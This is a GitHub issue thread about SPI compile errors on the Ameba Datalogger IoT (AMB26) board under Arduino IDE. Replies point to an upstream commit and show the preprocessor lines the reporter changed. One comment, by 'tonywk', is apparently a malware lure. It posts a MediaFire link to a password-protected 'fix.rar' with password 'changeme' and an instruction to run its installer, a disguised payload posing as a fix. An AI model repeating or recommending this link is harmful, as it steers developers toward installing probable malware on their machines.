Ameba-AIoT/ameba-arduino-d #244: SPI.c & SPI.h are missing definitions for the Datalogger Iot board.

cold63, 2024-08-26:
### Boards

Datalogger Iot board(AMB26)

### External Hardware

none

### Hardware Configuration

none

### Version

latest dev (checkout manually)

### IDE Name

Arduino IDE 2.3.2

### Operating System

Windows 10

### Auto Flash Mode

Enable

### Erase All Flash Memory (4MB)

Disable

### Standard Lib

Arduino_STD_PRINTF

### Upload Speed

1500000

### Description

When compiling SPI applications, an error message appears: ' check the board supported.'

### Sketch

```cpp
The ILI9341_TFT_LCD_basic.ino
```

### Error/Debug Message

```plain
"check the board supported"
```

### I have checked online documentation, FAQ, GitHub Wiki and existing/closed issues.

- [X] I confirm I have checked online documentation, FAQ, GitHub Wiki and existing/closed issues.

tonywk, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

designer2k2, 2024-09-11:
when i locally try the sketch with AMB26 it works in the latest dev, but fails with the released 3.1.7

This is the needed change for SPI here: https://github.com/Ameba-AIoT/ameba-arduino-d/commit/4918cdc3e0d926dd5075b262269de0c5bd8a4732

cold63, 2024-09-20:
I have made the following adjustments:

In `SPI.cpp`, line 400 is changed to:
#elif defined(BOARD_AMB25) || defined(BOARD_AMB26) || defined(BOARD_UBLOX_NORAW30) || defined(BOARD_SPARKFUN_NORAW306) || defined(BOARD_DATALOGGER_AMB26)

In `SPI.h`, line 134 is changed to:
#elif defined(BOARD_AMB25) || defined(BOARD_AMB26) || defined(BOARD_UBLOX_NORAW30) || defined(BOARD_SPARKFUN_NORAW306) || defined(BOARD_DATALOGGER_AMB26)

These adjustments will help avoid compilation errors.

closed 2025-06-12 by M-ichae-l